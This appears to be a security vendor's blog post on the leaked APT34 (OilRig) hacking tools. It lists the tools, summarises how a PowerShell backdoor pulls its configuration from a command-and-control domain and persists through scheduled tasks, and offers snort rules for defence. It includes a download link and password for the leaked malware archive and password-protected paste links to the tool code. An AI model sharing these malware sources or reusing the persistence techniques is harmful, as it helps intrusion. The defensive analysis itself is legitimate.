What We know About APT34

What We know About APT34

APT -An introduction

An advanced persistent threat (APT) is a broad term used to describe an attack campaign in which an intruder, or team of intruders, establishes an illicit, long-term presence on a network in order to mine highly sensitive data.

Yesterday we heard about APT34 leak and we initiated event analysis towards it.

Tool address

https://s3-eu-west-1.amazonaws.com/malware-research.org/blogposts/apt34Leak/apt34leak.7z

Unzip password: vJrqJeJo2n005FF*

Event combing

Recently, a hacking tool for the APT attack organization APT34 (oilrig, Helix Kitten) belonging to the Iranian national background was released. This incident is similar to the hacker tool incident where the shadow broker leaked the NSA. Since mid-March, these tools have been The person who claimed to be Lab Dookhtegan leaked on the telegram program.

In addition to hacking tools, Dookhtegan also released data on some of the hacker victims who appear to be from APT34, including data and password combinations that appear to be collected through phishing pages.

List of hacking tools contents which were present in apt34 were:

- PoisonFrog (old version BondUpdater)

- HyperShell (a webshell named TwoFace)

- HighShell (another webshell)

- Webmask (DNS Tunnel, the famous DNSpionage)

We have analysed the code and the following were the analysis about it.Powershell code of tool can be found at the ghostbin.

Ghostbin url : https://ghostbin.com/paste/5j3kyr9p

Password : Velon

The agent part contains 2 base64s, which load powershell, which seems to be the first stage of the payload. It gets the configuration file from myleftheart.com (now closed), creates a bunch of folders in C:\Users\Public\Public, and deletes the other two payloads there. It also creates two scheduled tasks, one with administrator privileges and one with normal user rights, which will run two PowerShell scripts; dUpdater.ps1 and hUpdater.ps every 10 minutes. As is now clear from these two payloads that it can receive and send files.

How you can save your network.

We created a set of snort rules which can be used to prevent such attacks inside your network.

Please find the snort rules at our private ghostbin.

https://ghostbin.com/paste/o7yekg3o

Password : snortvelon.

What is encoding :

Encoding is the process of putting a sequence of characters such as letters, numbers and other special characters into a specialized format for efficient transmission. .Encoding should NOT be used for transporting sensitive information.
What is base64 :
When you have some binary data that you want to ship across a network, you generally don't do it by just streaming the bits and bytes over the wire in a raw format. Why? because some media are made for streaming text. You never know -- some protocols may interpret your binary data as control characters (like a modem), or your binary data could be screwed up because the underlying protocol might think that you've entered a special character combination (like how FTP translates line endings).

So to get around this, people encode the binary data into characters. Base64 is one of these types of encodings.

Why 64?
Because you can generally rely on the same 64 characters being present in many character sets, and you can be reasonably confident that your data's going to end up on the other side of the wire uncorrupted.

Why only snort for fix

As of now we have identified fix through snort an open source intrusion detection tool which helps us to evade possible threats within network.We were working on solution for end users whom does not own any networks.

Stay tuned with us for future updates.


FREE eBook 3 Essential types of cyber security solutions your business must haveDownload Now
+